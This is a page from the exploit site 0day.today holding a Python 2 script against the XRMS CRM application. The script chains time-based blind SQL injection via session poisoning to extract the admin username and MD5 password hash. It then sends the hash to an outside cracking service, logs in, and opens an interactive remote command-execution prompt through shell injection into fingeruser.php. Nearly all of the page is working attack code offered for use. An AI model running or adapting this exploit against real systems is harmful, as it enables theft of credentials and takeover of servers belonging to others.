0day.today - Biggest Exploit Database in the World.
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn
GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Contact us
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
XRMS - Blind SQL Injection and Command Execution Exploit
[#######################
# XRMS Blind SQLi via $_SESSION poisoning, then command exec
#########################
import urllib
import urllib2
import time
import sys
usercharac = ['a','b','c','d','e','f','g','h','i','j','k','l','m','n','o','p','q','r','s','t','u','v','w','x','y','z','@','.','_','-','1','2','3','4','5','6','7','8','9','0']
userascii = [97, 98, 99, 100, 101, 102, 103, 104, 105, 106, 107, 108, 109, 110, 111, 112, 113, 114, 115, 116, 117, 118, 119, 120, 121, 122, 64, 46, 95, 45, 49, 50, 51, 52, 53, 54, 55, 56, 57, 48]
def banner():
print """ ____
/ __/_ ______ _ _ ___________ ___ _____
/ /_/ / / / __ `/ | |/_/ ___/ __ `__ \/ ___/
/ __/ /_/ / /_/ / _> </ / / / / / / (__ )
/_/ \__,_/\__, (_)_/|_/_/ /_/ /_/ /_/____/
/_/
[+] fuq th3 w0rld, fuq ur m0m!\n"""
def usage():
print " [+] Info: Remote Command Execution via $_SESSION poisoning to SQLi to RCE"
print " [+] Example:"
print " [+] python " + sys.argv[0] + " domain.to/xrms"
quit()
def sendhashaway(hash):
print " [+] Sending hash to icrackhash.com to be cracked."
data = None
headers = { 'Referer' : 'http://icrackhash.com/?mdhash=' + hash + '&type=MD5','User-Agent' : 'Mozilla','X-Requested-With' : 'XMLHttpRequest'}
url = 'http://www.icrackhash.com/?mdhash=' + hash + '&type=MD5'
gh = urllib2.Request(url,data,headers)
gh2 = urllib2.urlopen(gh)
output = gh2.read()
plaintext = getpositions(output,'<td><small><strong>','</strong>')
print " [-] Plaintext of hash: " +plaintext + "\n"
return plaintext
def username(length):
length = length + 1
duser = []
#1) UNION ALL SELECT 1,2,3,4,5,6,7,8,9-- -
found = 0
i = 1
payload1 = "1) UNION ALL SELECT 1,2,3,4,5,6,7,8,IF(SUBSTRING(username,"
payload2 = ",1)=CHAR("
payload3 = "),BENCHMARK(5000000,MD5(0x34343434)),NULL) FROM users-- -"
for i in range(1,length):
found = 0
while(found != 1):
for f in range(0,len(userascii)):
class LeHTTPRedirectHandler(urllib2.HTTPRedirectHandler):
def http_error_302(self, req, fp, code, msg, headers):
infourl = urllib2.addinfourl(fp, headers, req.get_full_url())
infourl.status = code
infourl.code = code
return infourl
http_error_300 = http_error_302
class HeadRequest(urllib2.Request):
def get_method(self):
return "POST"
payload = payload1 + str(i) + payload2 + str(userascii[f]) + payload3
data = urllib.urlencode([('user_id',payload)])
url = 'http://'+domain+'/plugins/webform/new-form.php'
opener = urllib2.build_opener(LeHTTPRedirectHandler)
req = HeadRequest(url,data)
prepare = opener.open(req)
cookie1 = prepare.info()
cookie2pos1 = str(cookie1).find('PHPSESSID')
cookie2pos2 = str(cookie1).find("\n",cookie2pos1)
line = str(cookie1)[cookie2pos1:cookie2pos2 - 9]
line = 'XRMS' + line[9:]
url = 'http://'+domain+'/plugins/useradmin/fingeruser.php'
headers = { 'Cookie' : line }
data = None
start = time.time()
get = urllib2.Request(url,data,headers)
get.get_method = lambda: 'HEAD'
try:
execute = urllib2.urlopen(get)
except:
pass
elapsed = (time.time() - start)
if(elapsed > 1):
print " Character found. Character is: " + usercharac[f]
duser.append(usercharac[f])
found = 1
return duser
def getusernamelength():
found = 0
i = 1
payload1 = "1) UNION ALL SELECT 1,2,3,4,5,6,7,8,IF(LENGTH(username) = '"
payload2 = "',BENCHMARK(50000000,MD5(0x34343434)),NULL) FROM users-- -"
while (found != 1):
class LeHTTPRedirectHandler(urllib2.HTTPRedirectHandler):
def http_error_302(self, req, fp, code, msg, headers):
infourl = urllib2.addinfourl(fp, headers, req.get_full_url())
infourl.status = code
infourl.code = code
return infourl
http_error_300 = http_error_302
class HeadRequest(urllib2.Request):
def get_method(self):
return "POST"
payload = payload1 + str(i) + payload2
data = urllib.urlencode([('user_id',payload)])
url = 'http://'+domain+'/plugins/webform/new-form.php'
opener = urllib2.build_opener(LeHTTPRedirectHandler)
req = HeadRequest(url,data)
prepare = opener.open(req)
cookie1 = prepare.info()
cookie2pos1 = str(cookie1).find('PHPSESSID')
cookie2pos2 = str(cookie1).find("\n",cookie2pos1)
line = str(cookie1)[cookie2pos1:cookie2pos2 - 9]
line = 'XRMS' + line[9:]
url = 'http://'+domain+'/plugins/useradmin/fingeruser.php'
headers = { 'Cookie' : line }
data = None
start = time.time()
get = urllib2.Request(url,data,headers)
get.get_method = lambda: 'HEAD'
try:
execute = urllib2.urlopen(get)
except:
pass
elapsed = (time.time() - start)
if(elapsed > 1):
print " Length found at position: " + str(i)
found = 1
length = i
return length
i = i + 1
def password(length):
length = length + 1
dpassword = []
#1) UNION ALL SELECT 1,2,3,4,5,6,7,8,9-- -
found = 0
i = 1
payload1 = "1) UNION ALL SELECT 1,2,3,4,5,6,7,8,IF(SUBSTRING(password,"
payload2 = ",1)=CHAR("
payload3 = "),BENCHMARK(5000000,MD5(0x34343434)),NULL) FROM users-- -"
for i in range(1,length):
found = 0
while(found != 1):
for f in range(0,len(userascii)):
class LeHTTPRedirectHandler(urllib2.HTTPRedirectHandler):
def http_error_302(self, req, fp, code, msg, headers):
infourl = urllib2.addinfourl(fp, headers, req.get_full_url())
infourl.status = code
infourl.code = code
return infourl
http_error_300 = http_error_302
class HeadRequest(urllib2.Request):
def get_method(self):
return "POST"
payload = payload1 + str(i) + payload2 + str(userascii[f]) + payload3
data = urllib.urlencode([('user_id',payload)])
url = 'http://'+domain+'/plugins/webform/new-form.php'
opener = urllib2.build_opener(LeHTTPRedirectHandler)
req = HeadRequest(url,data)
prepare = opener.open(req)
cookie1 = prepare.info()
cookie2pos1 = str(cookie1).find('PHPSESSID')
cookie2pos2 = str(cookie1).find("\n",cookie2pos1)
line = str(cookie1)[cookie2pos1:cookie2pos2 - 9]
line = 'XRMS' + line[9:]
url = 'http://'+domain+'/plugins/useradmin/fingeruser.php'
headers = { 'Cookie' : line }
data = None
start = time.time()
get = urllib2.Request(url,data,headers)
get.get_method = lambda: 'HEAD'
try:
execute = urllib2.urlopen(get)
except:
pass
elapsed = (time.time() - start)
if(elapsed > 1):
print " Character found. Character is: " + usercharac[f]
dpassword.append(usercharac[f])
found = 1
return dpassword
def login(domain,user,password):
cookie = "XRMS=iseeurgettinown4d"
url = 'http://'+domain+'/login-2.php'
headers = { 'Cookie' : cookie }
data = urllib.urlencode([('username',user),('password',password)])
a1 = urllib2.Request(url,data,headers)
a2 = urllib2.urlopen(a1)
output = a2.read()
if output.find('PEAR.php') > 0:
print " [+] Logged In"
def commandexec(domain,command):
cookie = "XRMS=iseeurgettinown4d"
cmd = urllib.urlencode([("; echo '0x41';" + command + ";echo '14x0';",None)])
headers = { 'Cookie' : cookie }
data = None
url = 'http://'+domain+'/plugins/useradmin/fingeruser.php?username=' + cmd
b1 = urllib2.Request(url,data,headers)
b2 = urllib2.urlopen(a1)
output = b2.read()
first = output.find('0x41') + 4
last = output.find('14x0') - 4
return output[first:last]
banner()
if len(sys.argv) < 2:
usage()
domain = sys.argv[1]
print " [+] Grabbing username length"
length = getusernamelength()
print " [+] Grabbing username characters"
tmpuser = username(length)
adminusr = "".join(tmpuser)
print " [+] Grabbing password hash"
tmppass = password(32)
admpass = "".join(tmppass)
print " [+] Admin username: "+ adminusr
print " [+] Admin password hash: " + admpass
plain = sendhashaway(admpass)
login(domain,adminusr,plain)
while(quit != 1):
cmd = raw_input(' [+] Run a command: ')
if cmd == 'quit':
print " [-] Hope you had fun :)"
quit = 1
if cmd != 'quit':
print " [+] "+ commandexec(domain,cmd)
# 0day.today [2024-12-26] #